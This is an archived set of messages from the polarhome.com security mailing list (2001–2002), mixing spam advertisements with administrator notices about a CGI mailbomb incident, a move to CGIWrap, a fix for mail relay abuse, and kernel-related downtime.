Message-Id: <200111270504.NAA27659@ns4.trafficmagnet.net>
From: Christine Hall <return@trafficmagnet.net>
To: "security@polarhome.com" <security@polarhome.com>
Date: Wed, 28 Nov 2001 9:11:19 +0800
X-Mailer: CSMTPConnection v2.17
MIME-Version: 1.0
Content-Type: multipart/related; boundary="9e157335-4747-4baa-bcfe-d32d2d0297b3"
Content-Transfer-Encoding: quoted-printable
Reply-To: Christine Hall <christine@trafficmagnet.net>
Subject: [Security] WWW.POLARHOME.COM
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.6
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format
--9e157335-4747-4baa-bcfe-d32d2d0297b3
Content-Type: text/html; charset=iso-8859-1
Content-Transfer-Encoding: quoted-printable

Hi

I visited WWW.POLARHOME.COM <http://www.trafficmagnet.net>, and noticed
that you're not listed on some search engines! I think we can offer you a
service which can help you increase traffic and the number of visitors to
your website.

I would like to introduce you to TrafficMagnet.net
<http://www.trafficmagnet.net>. We offer a unique technology that will
submit your website to over 300,000 search engines and directories every
month.

You'll be surprised by the low cost, and by how effective this website
promotion method can be.

To find out more about TrafficMagnet and the cost for submitting your
website to over 300,000 search engines and directories, visit
www.TrafficMagnet.net <http://www.trafficmagnet.net>.

I would love to hear from you.

Best Regards,

Christine Hall
Sales and Marketing
E-mail: christine@trafficmagnet.net
http://www.TrafficMagnet.net

--9e157335-4747-4baa-bcfe-d32d2d0297b3--

From root@gate.polarhome.com  Thu Jan 17 12:05:43 2002
Received: from localhost (root@localhost)
	by gate.polarhome.com (8.11.6/linuxconf) with ESMTP id g0HB5h030463;
	Thu, 17 Jan 2002 12:05:43 +0100
Date: Thu, 17 Jan 2002 12:05:43 +0100 (CET)
From: root <root@gate.polarhome.com>
To: <security@polarhome.com>
cc: <polarhome@polarhome.com>
Message-ID: <Pine.LNX.4.33.0201171204360.30375-100000@gate.polarhome.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Subject: [Security] mailbomb
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

user tools:

Login: tools                            Name: vytenioplas
Directory: /home/t/tools                Shell: /bin/bash
Office: LT, vytenis@kaunas.omnitel.net
Last login Wed Jan 16 21:55 (CET) on ftp from 212.47.122.157

With a perl CGI script, the server sms.tele2.dk was mailbombed.

I don't really know whether it was an attack against polarhome or tele2.dk,
because both servers refused mail requests, creating a loop between smtp
daemons and applications.

Because of this incident perl has been disabled for all users, until we 
find some secure way to use it.

Denied users:
tools
and 
Login: perl                             Name: vytenis
Directory: /home/p/perl                 Shell: /bin/bash
Office: LT, vyteniz@centras.lt
Last login Wed Jan 16 21:52 (CET) on ftp from 212.47.122.157

Shame on you... 
It was a chicken attack that a hacker cannot be proud of.

root



From root@gate.polarhome.com  Wed Jan 23 15:52:49 2002
Received: from localhost (root@localhost)
	by gate.polarhome.com (8.11.6/linuxconf) with ESMTP id g0NEqnS06923;
	Wed, 23 Jan 2002 15:52:49 +0100
Date: Wed, 23 Jan 2002 15:52:49 +0100 (CET)
From: root <root@gate.polarhome.com>
To: polarhome@polarhome.com
cc: security@polarhome.com
Message-ID: <Pine.LNX.4.44.0201231551150.6813-100000@gate.polarhome.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Subject: [Security] CGI problem solved
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

polarhome found "some kind of solution" for the perl and CGI abuse problem. 
From now on, CGI is enabled just for trusted (shell) users. All other 
users (with just an ftp account) cannot execute CGI scripts. 
Read more about the differences between shell and ftp users in the shell 
policy: 
http://www.polarhome.com/service/policy.html 

How does it work now?
We changed the CGI wrapper on the FreeBSD and Linux boxes. Instead of suEXEC 
we use CGIWrap, which allows ACLs (access control lists), process and 
environment limits, and CGI debugging as well. With this method registered 
users got a much more open and safer CGI environment, but "anonymous" 
non-registered users lost CGI execution.
PHP is available to all users in safe mode.
Read more about CGIWrap at 
http://www.polarhome.com/service/manual/CGIWrap/ 

Usage:
Users will not notice the difference; it is absolutely transparent to users, 
so you can execute your CGI as before (in the example I will use user Anna's 
page).
CGI extensions in the polarhome realm are: cgi, pl, py, tcl

Execution: http://www.polarhome.com/~anna/cgi-bin/testcgi.pl 
or http://www.polarhome.com/cgi-bin/cgiwrap/anna/cgi-bin/testcgi.pl 

It is possible to debug your script with:
 http://www.polarhome.com/cgi-bin/cgiwrapd/anna/cgi-bin/testcgi.pl   
(cgiwrapd instead of cgiwrap in URL)

Otherwise it is possible to debug through log files at:  
http://www.polarhome.com/service/debug/

Enjoy.
Z


From root@gate.polarhome.com Mon Apr 22 15:54:48 2002
Received: from localhost (root@localhost)
	by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g3MDsm910808;
	Mon, 22 Apr 2002 15:54:48 +0200
Date: Mon, 22 Apr 2002 15:54:47 +0200 (CEST)
From: root <root@gate.polarhome.com>
To: polarhome@polarhome.com, <security@polarhome.com>
Message-ID: <Pine.LNX.4.44.0204221553130.10702-100000@gate.polarhome.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Subject: [Security] Mail problem solved
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

polarhome.com had a lot of problems because of abuse of the smtp, mail relay 
and imap, pop3, imaps and pop3s combination on the whole environment; 
therefore during the last month smtp was closed for remote hosts (that use 
imap, pop3 etc...) and polarhome had been placed on public relay lists.

BUT finally, after some test period, I am proud to announce that this 
problem has been solved and a robust and secure solution introduced that 
allows remote users to send mail, but stops relay and spam through the 
polarhome smtp mailer.

You can read more about the solution at 
http://www.polarhome.com/service/manual/drac-1.11 or at
http://mail.cc.umanitoba.ca/drac/

Thanks to Gary Mills <mailto:mills@cc.umanitoba.ca> from the University of Manitoba

Please use it and if you find some problem send it to 
support@polarhome.com

Regards, Z




From return@trafficmagnet.net Sat May  4 15:18:09 2002
Received: from ns5.trafficmagnet.net ([211.157.101.51])
	by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g44DHsl16288
	for <security@polarhome.com>; Sat, 4 May 2002 15:18:05 +0200
Received: from 29-Dispatcher ([211.101.236.29])
	by ns5.trafficmagnet.net (8.11.6/8.11.6) with SMTP id g453H3B30760
	for <security@polarhome.com>; Sat, 4 May 2002 22:17:08 -0500
Message-Id: <200205050317.g453H3B30760@ns5.trafficmagnet.net>
From: Christine Hall <return@trafficmagnet.net>
To: "security@polarhome.com" <security@polarhome.com>
Date: Sat, 4 May 2002 22:24:14 +0800
X-Mailer: CSMTPConnection v2.17
MIME-Version: 1.0
Content-Type: multipart/related; boundary="74d0c515-961b-435d-8758-de666c1820a8"
Content-Transfer-Encoding: quoted-printable
Reply-To: Christine Hall <christine@trafficmagnet.net>
Subject: [Security] WWW.POLARHOME.COM
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>


From reply@seekercenter.net Wed May 22 16:01:11 2002
Received: from tiantang163 ([211.101.236.162])
	by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g4ME18603588
	for <security@polarhome.com>; Wed, 22 May 2002 16:01:09 +0200
Message-Id: <200205221401.g4ME18603588@gate.polarhome.com>
From: "Vanessa Lintner" <reply@seekercenter.net>
To: security@polarhome.com
Content-Type: text/html;
Reply-To: "Vanessa Lintner" <vanessa@seekercenter.net>
Date: Wed, 22 May 2002 22:04:12 +0800
X-Priority: 3
X-Library: Business Promotion
Subject: [Security] I have visited GATE.POLARHOME.COM and noticed that ...
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>


From root@gate.polarhome.com Tue Jun 25 16:01:46 2002
Received: from localhost (root@localhost)
	by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g5PE1k512062;
	Tue, 25 Jun 2002 16:01:46 +0200
Date: Tue, 25 Jun 2002 16:01:46 +0200 (CEST)
From: root <root@gate.polarhome.com>
To: polarhome@polarhome.com, <security@polarhome.com>
Message-ID: <Pine.LNX.4.44.0206251600510.12007-100000@gate.polarhome.com>
MIME-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Subject: [Security] two weeks explanation
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

hi,

as all of you experienced, in the last 2 months gate, the polarhome realm
gateway, had extremely serious problems with system stability.
The system just hung without any log, it was sometimes extremely slow and
there were quite a lot of other symptoms for which I could not find any solution.
I've spent a lot of time debugging, checking, enabling/disabling services, and
in the end I came to the conclusion that the problem could be connected with NFS,
which polarhome heavily uses during inter-host communication.

I thought that it might even be a hacker attack or some nasty hard disk
failure...

Finally RedHat announced that some kernel bug is responsible for this 
behaviour. 
More to read at http://rhn.redhat.com/errata/RHBA-2002-110.html

From now on I will sleep better :)

... and another thing. Even though gate was in a very inconsistent state, I had
to leave it alone for some (exactly 3) weeks.
One week I was on a business trip (polarhome almost lost its administrator
in the Petakh Tikvah explosion in Tel Aviv) and later on a two-week holiday
with family.

I promised my girlfriend: no laptops, no internet cafes during the holiday
(seems I spend too much time with computers). I kept my word.  But now that
I know the reason for the problem... I see that I could not have done much
(from Poros, Greece) even if I had had access to a computer. gate was
down, therefore the rest of the system was unreachable as well.

I am terribly sorry, but I always try to point out that polarhome is a
non-commercial (better call it a hobby) association of enthusiasts that
relies on one person, therefore polarhome users should not expect
commercial service quality from polarhome. I and the COPS team and a lot of
others work overtime without any compensation, just to have a free and
nice island on the internet.

Hope that polarhome users can accept it as it is.

Regards, Z
root@polarhome.com



From sunpatel1234@hotmail.com Mon Jul  1 15:10:53 2002
Received: from smtp-server6.tampabay.rr.com (smtp-server6.tampabay.rr.com [65.32.1.43])
	by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g61DAqF06394
	for <security@polarhome.com>; Mon, 1 Jul 2002 15:10:53 +0200
Received: from TM1 (9.198.33.65.cfl.rr.com [65.33.198.9])
	by smtp-server6.tampabay.rr.com (8.12.2/8.12.2) with ESMTP id g61C6fmq022662
	for <security@polarhome.com>; Mon, 1 Jul 2002 09:10:50 -0400 (EDT)
Message-Id: <200207011310.g61C6fmq022662@smtp-server6.tampabay.rr.com>
From: sunpatel1234@hotmail.com
To: security@polarhome.com
Content-Type: text/html;
Date: Mon, 1 Jul 2002 08:21:32 -0400
X-Priority: 3
X-Library: Indy 8.0.25
Subject: [Security] Monthly Mail
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>



From crisha@trafficbbs.net Sun Jul  7 20:00:56 2002
Received: from TIANTANG160 ([211.101.236.160])
	by gate.polarhome.com (8.11.6/8.11.6) with ESMTP id g67I0b630841
	for <security@polarhome.com>; Sun, 7 Jul 2002 20:00:51 +0200
Message-Id: <200207071800.g67I0b630841@gate.polarhome.com>
From: "crisha@trafficbbs.net" <crisha@trafficbbs.net>
To: security@polarhome.com
Content-Type: multipart/alternative; boundary="=_NextPart_2rfkindysadvnqw3nerasdf";
MIME-Version: 1.0
Reply-To: "crisha@trafficbbs.net" <crisha@trafficbbs.net>
Date: Mon, 8 Jul 2002 03:04:35 +0800
X-Priority: 3
X-Library: Business Promotion
Subject: [Security] http://gate.polarhome.com/
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.8
Precedence: bulk
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Post: <mailto:security@polarhome.com>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

This is a multi-part message in MIME format

--=_NextPart_2rfkindysadvnqw3nerasdf
Content-Type: text/plain
Content-Transfer-Encoding: quoted-printable

Hello,

You may have spent much on lots of ways to achieve=20these - search engine registrations, website=20promotions, press release, email sending?- Here=20Traffic BBS presents you a unique method economically=20and professionally converting a PC into personal=20message distribution center=21 Traffic BBS assists you=20to post your message or ad to over 1,200,000+ message=20boards on the web worldwide. Along with a hyperlink=20to your website or email address, a message of your=20business, product, service or offer will be promptly=20submitted to targeted bulletin boards. You can expect=20instant response=21=20
Get your business, service, product or offer seen=21=20
Best Regards,
Crisha Wenston
Sales & Marketing=20www.trafficbbs.net
=20=20

--=_NextPart_2rfkindysadvnqw3nerasdf--

From smokesfromspain@terra.es Sat Sep 21 17:53:56 2002
Received: from linux.local ([213.9.245.200])
	by redhat.polarhome.com (8.11.6/8.11.6) with SMTP id g8LFrs211955
	for <security@polarhome.com>; Sat, 21 Sep 2002 17:53:55 +0200
Message-Id: <200209211553.g8LFrs211955@redhat.polarhome.com>
Received: (qmail 24050 invoked from network); 21 Sep 2002 13:39:13 -0000
Received: from unknown (HELO h) (192.168.0.2)
  by linux.local with SMTP; 21 Sep 2002 13:39:13 -0000
From: "Sales Department" <smokesfromspain@terra.es>
To: security@polarhome.com
Reply-To: smokesfromspain@terra.es
Date: Sat, 21 Sep 2002 15:44:35 +0200
X-Priority: 3
X-Library: Indy 8.0.25
Subject: [Security] Low Price Fags
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.13
Precedence: bulk
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Post: <mailto:security@polarhome.com>
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

Dear Sir or Madam

In the past you have requested information on discounted products. We hope that you find this of interest. If you are not a smoker, and find this email offensive, we sincerely apologise!  We will be only too happy to take you off our mailing list.

If you are a smoker, however, and are fed up with paying high prices for your cigarettes and tobacco, take a look at what we have to offer  by clicking on this link.
http://www.smokersassociation.co.uk/?S=16&ID=2

We can send you, legally, by registered air mail, direct to your door, 4 cartons of cigarettes or 40 pouches of rolling tobacco (all brands are available) from only 170 Euros - about 105 pounds - fully inclusive of postage and packing.  Why pay more?

To remove yourself from our mailing list, please click below
mailto:smokersclub@terra.es

Yours faithfully.
Smokers Association

http://www.smokersassociation.co.uk/?S=16&ID=2

xay1979741y

From sender@coolstats.com Sun Dec 22 01:33:06 2002
Received: from mail.actionbase.se ([212.247.15.209])
	by redhat.polarhome.com (8.12.5/8.12.5) with ESMTP id gBM0Wqpp007432
	for <security@polarhome.com>; Sun, 22 Dec 2002 01:33:05 +0100
Received: from localhost.localdomain ([211.157.101.64])
	by mail.actionbase.se (8.11.2/8.11.2) with ESMTP id gBLNO9k14816
	for <security@polarhome.com>; Sun, 22 Dec 2002 00:24:11 +0100
Received: from  ()
	by localhost.localdomain (8.11.6/8.11.6) with ESMTP id gBLNFIj04080
	for <security@polarhome.com>; Sun, 22 Dec 2002 07:15:38 +0800
Message-ID: <1059CR1000035970@p1j2m3a4.pdhost.com>
Date: Sun, 22 Dec 2002 07:24:41 +0800 (CST)
From: Jane Brooks <sender@coolstats.com>
Reply-To: Jane Brooks <jane_brooks@coolstats.com>
To: security@polarhome.com
Mime-Version: 1.0
Content-Type: multipart/alternative; boundary=1051628246.1040513081578.JavaMail.SYSTEM.emaserver2
X-EMA-CID: 3785073
X-EMA-LID: 
X-EMA-PC: 0f22a54b25e00
Subject: [Security] www.polarhome.com
Sender: security-admin@polarhome.com
Errors-To: security-admin@polarhome.com
X-BeenThere: security@polarhome.com
X-Mailman-Version: 2.0.13
Precedence: bulk
List-Unsubscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=unsubscribe>
List-Id: Discussion about security issues <security.polarhome.com>
List-Post: <mailto:security@polarhome.com>
List-Help: <mailto:security-request@polarhome.com?subject=help>
List-Subscribe: <http://www.polarhome.com/mailman/listinfo/security>,
	<mailto:security-request@polarhome.com?subject=subscribe>
List-Archive: <http://www.polarhome.com/pipermail/security/>

--1051628246.1040513081578.JavaMail.SYSTEM.emaserver2
Content-Type: text/plain; charset=utf-8
Content-Transfer-Encoding: 7bit

Hi, 

I thought you might be interested in getting in-depth knowledge about
your web audience and web traffic patterns in a reliable and
cost-effective way.

Stop Guessing - Start Knowing!
- CoolStats measures web site traffic and online behavior of your visitors.
- CoolStats will help you understand how to optimize your site to meet
  the needs of your visitors.
- You get access to detailed, real-time statistical analysis of your web
  pages - 24 hours a day.
  Click at http://www.coolstats.com/viewdemo/index.html to view Online Demo.
- CoolStats is the ultimate real-time tracking solution for small and 
  mid-sized businesses.
- 100% accuracy by measuring activity at the client, not via server based 
  log files.
- The fee of $19.95 is minimal compared to what it would cost you to run
  a tracking service yourself!

Why CoolStats? 
- no programming to do
- no servers to maintain
- no software applications to install

Special Offer! Now Only $19.95/month (Usual Price/$29.95).

Click at
http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000035970.1059.15.KLJ8asuNQOKLxP
to Sign Up now!

"We needed to make business sense out of our web visitor behavior -
CoolStats delivers first-class graphical reports that help us continuously
improve and optimize our website to match the requirements of our target
audience." BRYAN KASHILIN, BOSTON

Click at http://www.coolstats.com/product/customerref.html to check what
other customers say about us!

For more information about our website tracking services, please visit our
website or contact me directly at the below email. I look forward to
hearing from you soon.

Best regards,
Jane Brooks
CoolStats Support
Email: jane_brooks@coolstats.com
http://www.coolstats.com

Don't be the last one to know!


-----------------------------------------------------------------------
This message has been brought to security@polarhome.com.
If you do not wish to receive any more emails, please follow
the opt-out instruction below. We apologize for any inconvenience.
http://p1j2m3a4.pdhost.com/pdsvr/www/r?1000035970.1059.3.X+JZ5pYAQ2a28C
--1051628246.1040513081578.JavaMail.SYSTEM.emaserver2
Content-Type: text/html; charset=utf-8
Content-Transfer-Encoding: 7bit

<HTML>
<HEAD>
<!-- CS 2.1 -->
<TITLE></TITLE>
<LINK rel="StyleSheet" href="http://211.157.101.54/img/v2_txt.css" type="text/css">
</HEAD>
<BODY leftmargin="0" topmargin="0" rightmargin="0" bottommargin="0" marginwidth="0" marginheight="0">
<TABLE width="600" border="0" cellspacing="0" cellpadding="0" align="center" background="http://211.157.101.54/img/v2_bg01.jpg">
<TR>
	<TD COLSPAN="2"><BR>
	Hi,
	
	<P>I thought you might be interested in getting in-depth knowledge about your web
	audience and web traffic patterns in a reliable and cost-effective way.</P><IMG src="http://211.157.101.54/img/v1_hdr_sta